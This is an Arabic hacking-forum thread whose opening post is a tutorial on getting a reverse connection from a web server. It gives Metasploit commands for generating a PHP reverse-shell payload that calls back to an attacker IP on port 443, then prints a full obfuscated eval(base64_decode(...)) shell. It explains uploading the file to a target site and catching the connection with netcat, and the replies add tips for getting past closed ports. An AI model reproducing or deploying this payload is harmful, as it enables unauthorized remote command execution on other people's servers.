شرح الاتصال العكسي بالسيرفر عن طريق الشل كود

[CENTER][CENTER]السلام عليكم

اولا مبروك افتتاح هذا المنتدى واتمنى لكم المزيد من التقدم ان شاء الله

حبيت افيدكم بشرح بسيط

شرح الاتصال العكسي بالسيرفر عن طريق الشل كود

اولا ننفذ الأوامر التالية في الميتاسبلويت

انتم غيرو الايبي تبعي [SIZE=2]97.81.245.237[/SIZE] الى الايبي تبعكم

msf > use payload/php/reverse_php
    msf payload(reverse_php) > set LHOST97.81.245.237
    LHOST => 97.81.245.237
    msf payload(reverse_php) > set LPORT 443
    LPORT => 443
    msf payload(reverse_php) > set ENCODER php/base64
    ENCODER => php/base64
    msf payload(reverse_php) > generate -t raw
    [COLOR=Black]وفي الأخير نحصل الشل كود وفنأخذه كوبي ونحطه بين:
      
    [/COLOR]

<?
ضعه هنا
?>
  

[COLOR=Black]
اللي يفهم بالphp راح يفهمني

فيصير كالتالي

    [/COLOR]
    <?
eval(base64_decode(CQkkaXBhZGRyPWxvbmcyaXAoNjk0Mjk4Mzk1KTsKCQkkcG9ydD00NDM7CgkJCgkJCUBzZXRfdGltZV9saW1pdCgwKTs                                   gQGlnbm9yZV91c2VyX2Fib3J0KDEpOyBAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsKCQkJJGRpcz1AaW5pX2dldCgnZGlzYWJsZ                                   V9mdW5jdGlvbnMnKTsKCQkJaWYoIWVtcHR5KCRkaXMpKXsKCQkJCSRkaXM9cHJlZ19yZXBsYWNlKCcvWywgXSsvJywgJywnLCAkZGlzKTsKCQk                                   JCSRkaXM9ZXhwbG9kZSgnLCcsICRkaXMpOwoJCQkJJGRpcz1hcnJheV9tYXAoJ3RyaW0nLCAkZGlzKTsKCQkJfWVsc2V7CgkJCQkkZGlzPWFyc                                   mF5KCk7CgkJCX0KCQkJCgoJCWlmKCFmdW5jdGlvbl9leGlzdHMoJ1NrT2ZqR0VteEsnKSl7CgkJCWZ1bmN0aW9uIFNrT2ZqR0VteEsoJGMpewo                                   JCQkJZ2xvYmFsICRkaXM7CgkJCQkKCQkJaWYgKEZBTFNFICE9PSBzdHJwb3Moc3RydG9sb3dlcihQSFBfT1MpLCAnd2luJyApKSB7CgkJCQkkY                                   z0kYy4iIDI.chr(43).JjFcbiI7CgkJCX0KCQkJJFJESVJTPSdpc19jYWxsYWJsZSc7CgkJCSRKZU15Z3JxPSdpbl9hcnJheSc7CgkJCQoJCQl                                   pZigkUkRJUlMoJ2V4ZWMnKWFuZCEkSmVNeWdycSgnZXhlYycsJGRpcykpewoJCQkJJG89YXJyYXkoKTsKCQkJCWV4ZWMoJGMsJG8pOwoJCQkJJ                                   G89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwoJCQl9ZWxz.ZQoJCQlpZigkUkRJUlMoJ3N5c3RlbScpYW5kISRKZU15Z3JxKCdzeXN0ZW0nLC                                   RkaXMpKXsKCQkJCW9iX3N0YXJ0KCk7CgkJCQlzeXN0ZW0oJGMpOwoJCQkJJG89b2JfZ2V0X2NvbnRlbnRzKCk7CgkJCQlvYl9lbmRfY2xlYW4o                                   KTsKCQkJfWVsc2UKCQkJaWYoJFJESVJTKCdwcm9jX29wZW4nKWFuZCEkSmVNeWdycSgncHJvY19vcGVuJywkZGlzKSl7CgkJCQkkaGFuZGxlPX                                   Byb2Nfb3BlbigkYyxhcnJheShhcnJheShwaXBlLCdyJyksYXJyYXkocGlwZSwndycpLGFycmF5KHBpcGUsJ3cnKSksJHBpcGVzKTsKCQkJCSRv                                   PU5VTEw7CgkJCQl3aGlsZSghZmVvZigkcGlwZXNbMV0pKXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdLDEwMjQpOwoJCQkJfQoJCQkJQHByb2                                   NfY2xvc2UoJGhhbmRsZSk7CgkJCX1lbHNlCgkJCWlmKCRSRElSUygnc2hlbGxfZXhlYycpYW5kISRKZU15Z3JxKCdzaGVsbF9leGVjJywkZGlz                                   KSl7CgkJCQkkbz1zaGVsbF9leGVjKCRjKTsKCQkJfWVsc2UKCQkJaWYoJFJESVJTKCdwYXNzdGhydScpYW5kISRKZU15Z3JxKCdwYXNzdGhydS                                   csJGRpcykpewoJCQkJb2Jfc3RhcnQoKTsKCQkJCXBhc3N0aHJ1KCRjKTsKCQkJCSRvPW9iX2dldF9jb250ZW50cygpOwoJCQkJb2JfZW5kX2Ns                                   ZWFuKCk7CgkJCX1lbHNlCgkJCWlmKCRSRElSUygncG9wZW4nKWFuZCEkSmVNeWdycSg.ncG9wZW4nLCRkaXMpKXsKCQkJCSRmcD1wb3BlbigkY                                   ywncicpOwoJCQkJJG89TlVMTDsKCQkJCWlmKGlzX3Jlc291cmNlKCRmcCkpewoJCQkJCXdoaWxlKCFmZW9mKCRmcCkpewoJCQkJCQkkby49ZnJ                                   lYWQoJGZwLDEwMjQpOwoJCQkJCX0KCQkJCX0KCQkJCUBwY2xvc2UoJGZwKTsKCQkJfWVsc2UKCQkJewoJCQkJJG89MDsKCQkJfQoJCQoJCQkJc                                   mV0dXJuICRvOwoJCQl9CgkJfQoJCSRub2Z1bmNzPSdubyBleGVjIGZ1bmN0aW9ucyc7CgkJaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5                                   kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKCQkJJHM9QGZzb2Nrb3BlbigkaXBhZGRyLCRwb3J0KTsKCQkJd2hpbGUoJGM9ZnJlYWQoJ                                   HMsMjA0OCkpewoJCQkJJG91dCA9ICcnOwoJCQkJaWYoc3Vic3RyKCRjLDAsMykgPT0gJ2NkICcpewoJCQkJCWNoZGlyKHN1YnN0cigkYywzLC0                                   xKSk7CgkJCQl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0JyB8fCBzdWJzdHIoJGMsMCw0KSA9PSAnZXhpdCcpIHsKCQkJCQlic                                   mVhazsKCQkJCX1lbHNlewoJCQkJCSRvdXQ9U2tPZmpHRW14SyhzdWJzdHIoJGMsMCwtMSkpOwoJCQkJCWlmKCRvdXQ9PT1mYWxzZSl7CgkJCQk                                   JCWZ3cml0ZSgkcywkbm9mdW5jcyk7CgkJCQkJCWJyZWFrOwoJCQkJCX0KCQkJCX0KCQkJCWZ3cml0ZSgkcywkb3.V0KTsKCQkJfQoJCQlmY2xv                                   c2UoJHMpOwoJCX1lbHNlewoJCQkkcz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApOwoJCQlAc29ja2V0X2Nvbm                                   5lY3QoJHMsJGlwYWRkciwkcG9ydCk7CgkJCUBzb2NrZXRfd3JpdGUoJHMsInNvY2tldF9jcmVhdGUiKTsKCQkJd2hpbGUoJGM9QHNvY2tldF9y                                   ZWFkKCRzLDIwNDgpKXsKCQkJCSRvdXQgPSAnJzsKCQkJCWlmKHN1YnN0cigkYywwLDMpID09ICdjZCAnKXsKCQkJCQljaGRpcihzdWJzdHIoJG                                   MsMywtMSkpOwoJCQkJfSBlbHNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CgkJ                                   CQkJYnJlYWs7CgkJCQl9ZWxzZXsKCQkJCQkkb3V0PVNrT2ZqR0VteEsoc3Vic3RyKCRjLDAsLTEpKTsKCQkJCQlpZigkb3V0PT09ZmFsc2Upew                                   oJCQkJCQlAc29ja2V0X3dyaXRlKCRzLCRub2Z1bmNzKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJfQoJCQkJQHNvY2tldF93cml0ZSgkcywk
     ?>

[COLOR=Black]
[/COLOR]
الأن نحفظه في ملف بامتداد php

مثلا dz.php

ونرفعه على الشل

الآن مثل العادة نذهب للنت كات ونعمل تنصت على البورت 443 او البورت الذي استعملتوه انتم عند صناعة الشل كود

ثم نذهب نستعرض الشل كود الذي رفعناه

مثلا

www.site.com/dz.php

ونروح للنت كات ونجده اتصل معنا والحمد لله

أتمنى اكون افدتكم

واي استفسار انا حاضر

[/CENTER]
[/CENTER]

كويس

اما انا شل كود او اي شي ماراح يتصل عندي مادري الخلل من النظام او المودم الله يعين

اولا عذرا على هذه العبارة

اولا مبروك افتتاح هذا المنتدى واتمنى لكم المزيد من التقدم ان شاء الله

لأني كتبت الموضوع في منتدى آخر قبل كتابته هنا وعملت كوبي ديراكت

أخي FoX HaCkEr استعمل اتصال vpn وجرب الترويت

ممكن أخي فوكس السبب في البورتات مغلقة لازم يكون البورت مفتوح …

وكيماا قالك جرب vpn …

ميرسي علي الشرح

شكراً الاخ python_dz الطريقة تقريباً شغالة على معظم السرفرات و نلجأ الى استعمالها في حالة يكوون البرل معطل على السرفر .

merci bcp frero

تمام عليك يا برنس ويثبت الموضوع مؤقتا نظرا لاهميته :slight_smile:

تمام يا حج
بيتهيألى الطريقه شغاله ع php4
بس ممكن تتحل على الاصدار الخامس بتحويله للرابع بهتاكسس
تسلم ايدك

تسلم ادينك على الشرح الجميل

يعطيك العافية يالغالي على الشرح

تقبل مروري

merci bcp mon frère

اهلا يا حج
وعذراً ع المداخلة
شغالة ع أغلب السيرفرات ومنها php5 ودون الحاجة لهتاكس تغير الاصدار
فهمت قصدك ليس كباك دور الـ php الذي يعمل ع الاصدار الرابع فقط
واعتذر منك مرة اخرة ع المداخلة العنيفة هذه :):stuck_out_tongue:
ولست انا من أوجه لك أو اصححها لك وأتمنى ان تتقبلها بروح رياضية :wink:

كنا رح ننسا ان نشكر اخونا الجزائري على هذا الانجاز dddddd
والف شكر لكم

بارك الله بالجميع في هذا المنتدى وجعله محشر خير اخلاق وخير علم

مشكور ياغالي وما قصرت

الله يعطيك الف عافية ومفيدة لما الواحد مايقدر يفتح بورت

بنتضار جديدك

الحى تقيم ياغالي